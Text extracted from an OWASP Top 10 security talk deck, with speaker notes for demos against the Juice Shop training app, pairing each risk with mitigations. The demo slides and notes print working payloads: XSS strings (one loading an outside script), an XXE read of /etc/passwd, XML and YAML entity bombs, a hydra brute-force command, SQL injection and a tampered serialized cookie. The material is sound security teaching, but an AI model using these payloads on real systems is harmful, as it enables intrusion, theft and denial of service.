-
1.
OWASP TOP
10
Setting the bar for security
-
2.
2
Hi
Robert MacLean
@rmaclean | sadev.co.za
DevConf | DevUG | Equal
Experts
Cape Town | South Africa
-
3.
3
Mandatoryhackerphoto
-
4.
Content
warning
Do not try this at home. Hacking
is illegal without permission.
One demo contains F***
4
-
5.
What is OWASP?
Non-profit foundation for the improvement of security
of software
Join as a member to support them and get
conference discounts
Local meetups available
Cape Town: meetup.com/en-AU/OWASP-Cape-Town-
Chapter-Meetup
Produce tools: Zap, Dependency Scanner
Guidance
5
-
6.
OWASPTOP 10
Using the 2017 guidance as 2020 guidance is still
underway
As it evolves, items are added, merged and removed
This is the bar for security
Focused on web security but a lot is broadly
applicable
10 areas which can be implemented and exploited in
a variety of ways
Based on real world feedback from OWASP members
See: owasp.org/www-project-top-ten
Each scored on 4 axis (scale is 1 to 3):
Attack Vector: Exploitability
Security Weakness: Prevalence
Security Weakness: Detectability
Impact: Technical
6
-
7.
OWASPTOP 10
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10.Insufficient Logging & Monitoring
7
-
8.
Ten: Insufficient Logging & Monitoring
Not logging and auditing logins, fails, high-value transactions
Not enough information
Locally stored
Logs disabled or configured to ignore pen tests
Not alerting on logs & metrics
8
Exploitability: 2
Prevalence: 3
Detectability: 1
Technical: 2
-
9.
Nine: Using Components with KnownVulnerabilities
3rd party code runs in same permissions as the system
OS, database etc… all need to be checked too
Scan on a continuous basis
• Library tools like dependency check and npm audit
• Container scanning
• OS patching
Only obtain code from official sources
9
Exploitability: 2
Prevalence: 3
Detectability: 2
Technical: 2
-
10.
Eight: Insecure Deserialization
A specially crafted data structure causes the execution of code
Focused on any time you use serialisation
10
Exploitability: 1
Prevalence: 2
Detectability: 2
Technical: 3
-
11.
Demo
11
-
12.
Eight: Insecure Deserialization
User input should not be trusted
Don’t accept serialised data
• If you must, encrypt and/or sign the payloads
Use safe deserialization options
12
-
13.
Seven: Cross-Site Scripting (XSS)
Reflected XSS: Not validating input & returning it back to the user
Stored XSS: Not validating input, putting it in the DB and then raising it later
DOM XSS: APIs sending attackable content to the UI
Can lead to account take overs, spam, multi-factor bypasses, key logging
13
Exploitability: 3
Prevalence: 3
Detectability: 3
Technical: 2
-
14.
Demo
14
-
15.
Demos
<script>alert(`xss`)</script>
<iframe src="javascript:alert(`xss`)">
<<a|ascript>alert(`xss`)</script>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<SCRIPT>alert("XSS");</SCRIPT>
15
_=`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<
<!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!
[]<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`,__=`${`${
{}}`[!!{}<<![]]}${`${{}}`[!!{}<<!![]]}${`${!![][~[]]}`[[]<<[]]}${`${![][~[]]}`[!!{}<<!![]]}${`${!![][~[]]}
`[(!![]<<!![])|!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${!![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![]
]}${`${[][~[]]}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}!`,[][_][_](`${`${{
}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!!
[]]}${`${{}}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[[]<<[]]
}'${`${!![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!{}<<![]]}${`${``[_]}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!
!{}<<!![]]}'${`${{}}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}(__)`)()
-
16.
Seven: Cross-Site Scripting (XSS)
User input should not be trusted
HTML escape any dynamic content (tags, attribute, css etc..)
Use a safer format for input, say markdown
Make use of HTTPOnly cookies
Make use of CORS
Make use of CSP
Make use of audit tools
16
-
17.
Six: Security Misconfiguration
Unused ports and services running on machines
Default credentials
Error handling returning too much info
Using code with known issues
17
Exploitability: 3
Prevalence: 3
Detectability: 3
Technical: 2
-
18.
Demo
18
-
19.
Six: Security Misconfiguration
User input should not be trusted
Get security audits done
Go on security training
Automate checking of settings and code
Remove (or block) anything not needed
19
-
20.
Five: Broken Access Control
Authentication vs. Authorization
Bypassing access by edit URL or anything on the client side
IDORs
20
Exploitability: 2
Prevalence: 2
Detectability: 2
Technical: 3
-
21.
Demo
21
-
22.
Five: Broken Access Control
User input should not be trusted
Deny by default
Rate limits
Disable web server directory listing
22
-
23.
Four: XML External Entities (XXE)
Untrusted XML is provided
• SAML auth
The XML parser has lots of features and those features are exploited
23
Exploitability: 2
Prevalence: 2
Detectability: 3
Technical: 3
-
24.
Demos
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
24
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>
-
25.
Demos
25
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
100
1000
10 000
100 000
1 000 000
10 000 000
100 000 000
1 BILLION
-
26.
Four: XML External Entities (XXE)
User input should not be trusted
Run static code analysis tools
Run dependency analysis tools
• NPM & Yarn Audit
• Dependency Check for JVM
Disable SOAP prior to 1.2
Disable features you do not need
• XML external entities & DTD in XML
26
-
27.
Three: Sensitive Data Exposure
Man-in-the-middle attacks
Stealing records off the server or servers it was sent through
Weak crypto
No hashing on the passwords
Sharing data which should be private
27
Exploitability: 2
Prevalence: 3
Detectability: 2
Technical: 3
-
28.
Demo
28
-
29.
Three: Sensitive Data Exposure
Classify data processed, stored and transmitted.
Identify risk for business, law (GDPR)
Only store information you must
Encrypt sensitive data at rest
Encrypt all data in transit
Disable caching of sensitive data
HSTS Preload
29
-
30.
Two: Broken Auth
Default admin accounts
Credential Stuffing, brute force and dictionary attacks
Unexpired session tokens
Weak or ineffective forgot password and recovery processes
Plaintext passwords, not hashed passwords
Not invalidating session IDs
30
Exploitability: 3
Prevalence: 2
Detectability: 2
Technical: 3
-
31.
Demo
31
-
32.
Demos
$ hydra -l admin@juice-sh.op
-P /usr/share/wordlists/rockyou.txt 127.0.0.1
http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.’
-fV -s 3000 -t 1
32
-
33.
Two: Broken Auth
Do not build auth unless needed – make use of the existing team
Credential Stuffing, brute force and dictionary attacks
• haveibeenpwned.com/Passwords
• Rate limits
Unexpired session tokens
Weak or ineffective forgot password and recovery processes
• Avoid knowledge questions
• Do users need passwords
• Two factor auth
Plaintext passwords
• Just don’t
Hash & salt passwords
• Pick hashing algorithms which are slow and don’t have collisions
33
-
34.
One: Injection
Attacker sends data to the interpreter to get it to return the incorrect answer, change settings they shouldn’t be
able to or increase privileges
SQL Injection is a vector, but this could be any database, environmental variables, JSON, SOAP, XML, headers,
cookies, etc…
34
Exploitability: 3
Prevalence: 2
Detectability: 3
Technical: 3
-
35.
Demo
35
-
36.
One: Injection
User input should not be trusted
Use SQL parameters for SQL
Avoid building strings in code based on user input
Use approval lists to check content
“I use an ORM, so I am safe” – By default, most likely but you should check
Use tools like ZAP to look for these
36
-
37.
Done?
No, this is the minimum bar
Join your local OWASP group
Run your checks all the time
Get a red team
Practice incidents
Secure by default is a great first principal
37
-
38.
Thank You
Robert MacLean
robert@sadev.co.za
Photo by Francois Hoang on Unsplash
Photo by Andrew Haimerl on Unsplash
Photo by Luther Bottrill on Unsplash
Photo by Emre Karataş on Unsplash
Photo by Levon Vardanyan on Unsplash
Photo by Austrian National Library on Unsplash
http://www.appsensor.org/
Leonard H. Courtney \ Lies — damned lies — and statistics \ The price of peace is eternal vigilance
A PHP forum uses PHP object serialization to save a “super” cookie, containing the user’s user ID, role, password hash, and other state:a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}An attacker changes the serialized object to give themselves admin privileges:a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
Photo by Denny Ryanto on Unsplash
https://juice-shop.herokuapp.com/api-docs/
{
"cid": "JS0815DE",
"orderLines": [{
"product": "(function dos() { while(true); })()"
}]
}
var x = 'var y = {"name":(function hi() { console.log(1) })()}’
JSON.parse(x)
eval(x)
Photo by kevin laminto on Unsplash
Talk about alert
Try search for <script>alert(“1”)</script>
Show network tab is filtering it out… smart
<iframe src="javascript:alert(`xss`)">
https://github.com/ihebski/XSS-Payloads
http://www.jsfuck.com/
Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. The attacker then finds a serious access control flaw in the application.
Photo by JJ Ying on Unsplash
https://obscure-chamber-62037.herokuapp.com/#/deluxe-membership
Photo by Victor Li on Unsplash
Just go to https://juice-shop.herokuapp.com/ftp
Tell story about query param for user ID
Photo by Oleksandr Zhabin on Unsplash
https://juice-shop.herokuapp.com/admin#/saved-payment-methods
Show how credit card number is in network tab
Photo credit https://www.flickr.com/photos/bookcatalog/27162728588
Photo by Alexander Popov on Unsplash
bjoern@juice-sh.op & West-2082
https://juice-shop.herokuapp.com/admin#/forgot-password
https://tools.kali.org/password-attacks/hydra
rockyou.txt contains 14,341,564 unique passwords, used in 32,603,388 accounts.
https://www.kaggle.com/wjburns/common-password-list-rockyoutxt
Photo by Levon Vardanyan on Unsplash
https://juice-shop.herokuapp.com/#/
Make sure to open network diagnostic
Try quote for email and show error
Talk about limiting errors back to users
Then use a single quote for the email
1' OR '1=1' --
SELECT * FROM Users WHERE email = '1' OR '1=1' -- AND password = 'a8f5f167f44f4964e6c998dee827110c' AND deletedAt IS NULL
https://mybroadband.co.za/news/security/179064-ethekwini-municipality-leaking-private-details-of-over-300000-residents.html
Photo by Victor Rodriguez on Unsplash
Photo by Jonathan Formento on Unsplash